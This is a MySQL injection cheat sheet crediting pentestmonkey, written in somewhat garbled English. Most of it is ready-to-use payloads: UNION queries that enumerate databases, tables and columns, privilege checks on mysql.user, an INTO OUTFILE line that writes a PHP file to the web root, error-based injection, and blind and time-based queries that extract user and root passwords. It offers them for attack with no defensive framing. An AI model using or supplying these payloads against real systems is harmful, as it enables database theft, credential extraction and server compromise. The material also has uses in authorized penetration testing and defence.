MySQL injection summary

Mysql injection is through the SQL command into the Web form submit or enter the domain name query string or page request, and ultimately to deceive the server to execute malicious SQL commands. Specifically, it leverages existing applications to inject (malicious) SQL commands into the background database engine, which can be exploited by typing (malicious) SQL statements into a Web site that has a security vulnerability Database, rather than according to the intention of the designer to execute SQL statements.

Mysql general injection (select)

• Comment
  #
  /*
  —
  
• sql injection whitespace
  Use / **/ or () or + instead of spaces
  %0c = form feed, new page
  %09 = horizontal tab
  %0d = carriage return
  %0a = line feed, new line
  
• Multiple data display

  concat()
  group_concat()
  concat_ws()
  

• related functions
  system_user()
  user()
  current_user
  session_user()
  database()
  version() MYSQL
  load_file() MYSQL
  @@datadir
  @@basedir MYSQL
  @@version_compile_os

• mysql general injection statement
  • View mysql basic information

    and 1=2 union select 1,2,3,concat_ws(char(32,58,32),0x7c,user(),database(),version()),5,6,7/*

  • Query the database
    and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1/*
    and 1=2 union select 1,group_concat(schema_name),3,4 from information_schema.schemata/*

  • Query table name

    and 1=2 union select 1,2,3,4,table_name,5 from information_schema.tables where table_schema=”Database hexadecimal encoding limit” 1,1/*

    and 1=2 union select 1,2,3,4,group_concat(table_name),5 from information_schema.tables where table_schema=”Database hexadecimal encoding”/*

  • Query field

    and 1=2 union select 1,2,3,4,column_name,5,6,7 from information_schema.columns where table_name=”Table name of the hexadecimal encoding” and table_schema=”Database hexadecimal encoding” limit 1,1/*

    and 1=2 union select 1,2,3,4,group_concat(column_name),5,6,7 from information_schema.columns where table_name=”Table name of the hexadecimal encoding” and table_schema=”Database hexadecimal encoding”/*

  • Determine if you have read and write permissions

    and (select count(*) from mysql.user)>0/*

    and (select count(file_priv) from mysql.user)>0/*

  • Write outfile

    union select 1,2,3,load_file(‘d:\web\logo123.jpg’),5,6,7,8,9,10,7 into outfile ‘d:\web\90team.php’/*

Mysql error injection

• and(select 1 from(select count(*),concat((select (select (Statement)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
  Fill in the sentence sentence, such as: SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1
• and+1=(select+*+from+(select+NAME_CONST((Statement),1),NAME_CONST(Statement),1))+as+x)–
• update web_ids set host=’www.0x50sec.org’ where id =1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (Statement)),1,62)))a from information_schema.tables group by a)b);
• insert into web_ids(host) values((select (1) from mysql.user where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (Statement)),1,62)))a from information_schema.tables group by a)b)));

Mysql general blind

• Use ASCII
  AND ascii(substring((SELECT password FROM users where id=1),1,1))=49
• Use regular expressions

  and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA=”blind_sqli” AND table_name REGEXP ‘^[a-n]’ LIMIT 0,1)

Mysql time blind

• 1170 union select if(substring(current,1,1)=char(11),benchmark(5000000,encode(‘msg’,’by 5 seconds’)),null) from (select database() as current) as tbl
• UNION SELECT IF(SUBSTRING(Password,1,1)=’a’,BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = ‘root’

Reference: pentestmonkey